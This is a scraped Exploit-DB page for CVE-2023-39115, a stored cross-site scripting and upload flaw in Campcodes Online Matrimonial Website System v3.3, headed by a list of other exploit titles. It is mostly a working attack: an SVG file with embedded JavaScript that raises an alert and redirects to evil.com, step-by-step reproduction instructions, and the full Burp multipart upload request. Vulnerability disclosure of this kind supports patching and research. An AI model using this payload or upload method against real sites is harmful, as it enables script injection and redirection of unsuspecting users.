010e679abe
25 changes to exploits/shellcodes/ghdb ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE) Shelly PRO 4PM v0.11.0 - Authentication Bypass Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated) Academy LMS 6.0 - Reflected XSS Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload JLex GuestBook 1.6.4 - Reflected XSS Joomla JLex Review 6.0.1 - Reflected XSS News Portal v4.0 - SQL Injection (Unauthorized) PHPJabbers Cleaning Business 1.0 - Reflected XSS PHPJabbers Night Club Booking 1.0 - Reflected XSS PHPJabbers Rental Property Booking 2.0 - Reflected XSS PHPJabbers Service Booking Script 1.0 - Reflected XSS PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS PHPJabbers Taxi Booking 2.0 - Reflected XSS Webedition CMS v2.9.8.8 - Remote Code Execution (RCE) Webedition CMS v2.9.8.8 - Stored XSS Webutler v3.2 - Remote Code Execution (RCE) WordPress adivaha Travel Plugin 2.3 - Reflected XSS WordPress adivaha Travel Plugin 2.3 - SQL Injection Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
101 lines
No EOL
2.9 KiB
Text
101 lines
No EOL
2.9 KiB
Text
# Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
|
|
# Date: 3-8-2023
|
|
# Category: Web Application
|
|
# Exploit Author: Rajdip Dey Sarkar
|
|
# Version: 3.3
|
|
# Tested on: Windows/Kali
|
|
# CVE: CVE-2023-39115
|
|
|
|
|
|
|
|
Description:
|
|
----------------
|
|
|
|
An arbitrary file upload vulnerability in Campcodes Online Matrimonial
|
|
Website System Script v3.3 allows attackers to execute arbitrary code via
|
|
uploading a crafted SVG file.
|
|
|
|
|
|
SVG Payload
|
|
------------------
|
|
|
|
<?xml version="1.0" standalone="no"?>
|
|
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
|
|
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
|
|
|
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
|
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
|
|
stroke="#004400"/>
|
|
<script type="text/javascript">
|
|
alert("You have been hacked!!")
|
|
|
|
|
|
window.location.href="https://evil.com"
|
|
</script>
|
|
</svg>
|
|
|
|
|
|
Steps to reproduce
|
|
--------------------------
|
|
|
|
-Login with your creds
|
|
-Navigate to this directory - /profile-settings
|
|
-Click on Gallery -> Add New Image -> Browser -> Add Files
|
|
-Choose the SVG file and upload done
|
|
-Click the image!! Payload Triggered
|
|
|
|
|
|
Burp Request
|
|
-------------------
|
|
|
|
POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
|
|
Gecko/20100101 Firefox/115.0
|
|
Accept: */*
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
|
|
Content-Type: multipart/form-data;
|
|
boundary=---------------------------167707198418121100152548123485
|
|
Content-Length: 1044
|
|
Origin: http://localhost
|
|
Connection: close
|
|
Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create
|
|
Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg;
|
|
acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
|
|
Sec-Fetch-Dest: empty
|
|
Sec-Fetch-Mode: cors
|
|
Sec-Fetch-Site: same-origin
|
|
|
|
-----------------------------167707198418121100152548123485
|
|
Content-Disposition: form-data; name="relativePath"
|
|
|
|
null
|
|
-----------------------------167707198418121100152548123485
|
|
Content-Disposition: form-data; name="name"
|
|
|
|
file (1).svg
|
|
-----------------------------167707198418121100152548123485
|
|
Content-Disposition: form-data; name="type"
|
|
|
|
image/svg+xml
|
|
-----------------------------167707198418121100152548123485
|
|
Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg"
|
|
Content-Type: image/svg+xml
|
|
|
|
<?xml version="1.0" standalone="no"?>
|
|
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
|
|
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
|
|
|
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
|
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
|
|
stroke="#004400"/>
|
|
<script type="text/javascript">
|
|
alert("You have been hacked!!")
|
|
|
|
|
|
window.location.href="https://evil.com"
|
|
</script>
|
|
</svg>
|
|
-----------------------------167707198418121100152548123485-- |